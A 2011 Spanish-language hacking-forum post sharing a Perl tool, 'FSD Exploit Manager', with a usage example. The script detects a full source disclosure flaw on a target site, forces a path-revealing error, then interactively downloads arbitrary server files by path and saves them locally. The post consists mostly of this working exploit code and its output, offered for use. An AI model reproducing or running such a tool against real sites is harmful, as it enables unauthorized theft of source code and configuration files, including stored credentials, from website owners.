elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 09:17  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting (Moderadores: Novlucker, Leo Gutiérrez., EleKtro H@cker)
| | |-+  [Perl] FSD Exploit Manager		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] FSD Exploit Manager  (Leído 336 veces)
Doddy

Desconectado Desconectado

Mensajes: 220



Ver Perfil
[Perl] FSD Exploit Manager
« en: 7 Octubre 2011, 01:14 »
Un simple exploit que nos ayuda a explotar la vulnerabilidad Full Source Discloure de una forma muy relajante , lo bueno de este programa es que guarda todo lo descargado en una carpeta creada por el programa mismo.
Ademas detecta automaticamente Full Path Discloure para conocer las rutas necesarias para descargar
archivos.


Código
#!usr/bin/perl
#FSD Exploit Manager (C) Doddy Hackman 2011
 
use LWP::UserAgent;
use URI::Split qw(uri_split);
use File::Basename;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
$SIG{INT} = \&adios;
 
head();
if($ARGV[0]) {
ver($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub ver {
 
my $page = shift;
print "\n[+] Target : ".$page."\n\n";
 
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
 
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure Detect\a\n";
$code2 = toma($page."'");
if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
print "\n[+] Full Path Dislocure Detect : ".$1."\n";
}
installer();
while(1) {
print "\n\nurl>";
$SIG{INT} = \&adios;
chomp(my $url = <stdin>);
if (download($page.$url,"fsdlogs/".basename($url))) {
print "\n\n[+] File Downloaded\n";
system("start fsdlogs/".basename($url));
}
}
} else {
print "[-] Web not vulnerable\n\n";
}
}
}
 
sub adios {
print "\n\n[+] Good Bye\n";
copyright();
}
 
sub head {
print "\n\n-- == FSD Exploit Manager == --\n\n";
}
 
sub copyright {
print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
exit(1);
}
 
sub sintax {
print "\n[+] Sintax : $0 <page>\n";
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}
 
sub installer {
unless (-d "fsdlogs/") {
mkdir("fsdlogs/","777");
}}
 
# ¿ The End ? 
 

Un ejemplo de uso

Código:
C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=


-- == FSD Exploit Manager == --


[+] Target : http://localhost/down.php?down=

[+] Full Source Discloure Detect

[+] Full Path Dislocure Detect : C:\xampp\htdocs\down.php


url>c:/aca.txt


[+] File Downloaded


url>c:/aca.txt


[+] File Downloaded


[+] Good Bye


-- == (C) Doddy Hackman 2011 == --
« Última modificación: 8 Octubre 2011, 18:58 por Doddy » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Que significa #!/usr/bin/perl ?? como ejecutamos un exploit en perl...
Bugs y Exploits 		mousehack 7 2,198 Último mensaje 4 Noviembre 2005, 23:16
por BenRu
Facebook Manager [ Perl ]
Scripting 		Leo Gutiérrez. 0 618 Último mensaje 31 Diciembre 2010, 00:45
por Leo Gutiérrez.
[Perl] Mysql Manager
Scripting 		Doddy 0 136 Último mensaje 7 Octubre 2011, 01:14
por Doddy
[Perl] Manager
Scripting 		Doddy 0 114 Último mensaje 9 Octubre 2011, 17:50
por Doddy
[Perl] FTP Manager
Scripting 		Doddy 0 142 Último mensaje 14 Octubre 2011, 15:25
por Doddy
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines